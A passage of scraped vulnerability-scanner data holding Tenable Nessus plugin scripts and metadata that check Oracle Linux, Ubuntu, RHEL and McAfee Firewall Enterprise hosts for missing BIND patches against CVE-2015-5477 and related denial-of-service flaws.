this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1513 and \n# Oracle Linux Security Advisory ELSA-2015-1513 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85067);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"Oracle Linux 6 / 7 : bind (ELSA-2015-1513)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1513 :\n\nUpdated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated 
this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005223.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005246.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity 
> 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libs / bind-libs-lite / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:02", "description": "The remote host has a version of McAfee Firewall Enterprise installed that is affected by a denial of service vulnerability due to an assertion flaw that occurs when handling TKEY queries. A remote attacker can exploit this, via a specially crafted request, to cause a REQUIRE assertion failure and daemon exit, resulting in a denial of service condition.", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2015-08-14T00:00:00", "type": "nessus", "title": "McAfee Firewall Enterprise DoS (SB10126)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-04-09T00:00:00", "cpe": ["x-cpe:/a:mcafee:firewall_enterprise", "cpe:/a:isc:bind"], "id": "MCAFEE_FIREWALL_ENTERPRISE_SB10126.NASL", "href": "https://www.tenable.com/plugins/nessus/85402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85402);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/04/09 12:24:43\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"IAVB\", value:\"2015-B-0099\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10126\");\n\n script_name(english:\"McAfee Firewall Enterprise DoS (SB10126)\");\n script_summary(english:\"Checks the version of MFE.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Firewall 
Enterprise installed\nthat is affected by a denial of service vulnerability due to an\nassertion flaw that occurs when handling TKEY queries. A remote\nattacker can exploit this, via a specially crafted request, to cause a\nREQUIRE assertion failure and daemon exit, resulting in a denial of\nservice condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10126\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch referenced in the vendor security\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:mcafee:firewall_enterprise\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_firewall_enterprise_version.nbin\");\n script_require_keys(\"Host/McAfeeFE/version\", \"Host/McAfeeFE/version_display\", \"Host/McAfeeFE/installed_patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"lists.inc\");\n\napp_name = \"McAfee Firewall Enterprise\";\nversion = get_kb_item_or_exit(\"Host/McAfeeFE/version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfeeFE/version_display\");\ninstalled_patches = get_kb_item_or_exit(\"Host/McAfeeFE/installed_patches\");\n\npatchmap = make_array(\n \"^7\\.\" , make_list(\"70103E76\"),\n \"^8\\.3\\.[0-1](\\.|$)\" , make_list(\"8.3.1E81\"),\n \"^8\\.3\\.2(\\.|$)\" , make_list(\"8.3.2E61\")\n);\n\nfix_displays = make_array(\n \"^7\\.\" , \"70103E76\",\n \"^8\\.3\\.[0-1](\\.|$)\" , \"8.3.1 ePatch 81\",\n \"^8\\.3\\.2(\\.|$)\" , \"8.3.2 ePatch 61\"\n);\n\npatches = NULL;\nfix_display = NULL;\npatch_missing = TRUE;\n\n# Find our patch information\nforeach vergx (keys(patchmap))\n{\n if(version =~ vergx)\n {\n patches = patchmap[vergx];\n fix_display = fix_displays[vergx];\n break;\n }\n}\n\nif(isnull(patches) ||\n (\n installed_patches !~ \"(^|,)[\\d\\.]+?E\\d+?($|,)\" && collib::contains(compare:function ()\n {\n return _FCT_ANON_ARGS[1] =~ _FCT_ANON_ARGS[0];\n },\n list:patches,\n item:\"(^|,)[\\d\\.]+?E\\d+?($|,)\"\n )\n )\n )\n audit(AUDIT_INST_VER_NOT_VULN, version_display);\n\n# Check for patches that fix the issue\nforeach patch (patches)\n{\n if(patch >< installed_patches)\n {\n patch_missing = FALSE;\n break;\n }\n}\n\nif (patch_missing)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed Version : ' + version_display +\n '\\n Patched Version : ' + fix_display +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, fix_display, app_name);\n", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:58", "description": "Jonathan Foote discovered that Bind incorrectly handled certain TKEY queries. A remote attacker could use this issue with a specially crafted packet to cause Bind to crash, resulting in a denial of service. (CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain configurations involving DNS64. A remote attacker could use this issue with a specially crafted query to cause Bind to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS.\n(CVE-2012-5689).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : bind9 vulnerabilities (USN-2693-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5689", "CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bind9", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2693-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85081);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5689\", \"CVE-2015-5477\");\n script_xref(name:\"USN\", value:\"2693-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : bind9 vulnerabilities (USN-2693-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that Bind incorrectly handled certain TKEY\nqueries. A remote attacker could use this issue with a specially\ncrafted packet to cause Bind to crash, resulting in a denial of\nservice. (CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain\nconfigurations involving DNS64. A remote attacker could use this issue\nwith a specially crafted query to cause Bind to crash, resulting in a\ndenial of service. This issue only affected Ubuntu 12.04 LTS.\n(CVE-2012-5689).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2693-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind9 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bind9\", pkgver:\"1:9.8.1.dfsg.P1-4ubuntu0.12\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bind9\", pkgver:\"1:9.9.5.dfsg-3ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"bind9\", pkgver:\"1:9.9.5.dfsg-9ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind9\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:44:41", "description": "Updated bind packages that fix three security issues are now available for Red Hat Enterprise Linux 6.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477, CVE-2015-5722, and CVE-2015-8000 issues. 
Upstream acknowledges Jonathan Foote as the original reporter of CVE-2015-5477, and Hanno Bock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-29T00:00:00", "type": "nessus", "title": "RHEL 6 : bind (RHSA-2016:0079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2016-0079.NASL", "href": "https://www.tenable.com/plugins/nessus/88480", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0079. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88480);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\");\n script_xref(name:\"RHSA\", value:\"2016:0079\");\n\n script_name(english:\"RHEL 6 : bind (RHSA-2016:0079)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain\nmalformed DNSSEC keys. 
A remote attacker could use this flaw to send a\nspecially crafted DNS query (for example, a query requiring a response\nfrom a zone containing a deliberately malformed key) that would cause\nnamed functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use\nthis flaw to send a query to request a cached record with a malformed\nclass attribute that would cause named functioning as an authoritative\nor recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they\nperform authentication when making recursive queries to resolve\naddresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges\nJonathan Foote as the original reporter of CVE-2015-5477, and Hanno\nBock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe update, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://kb.isc.org/article/AA-01272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://kb.isc.org/article/AA-01287\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01287\"\n );\n # https://kb.isc.org/article/AA-01317\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8000\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
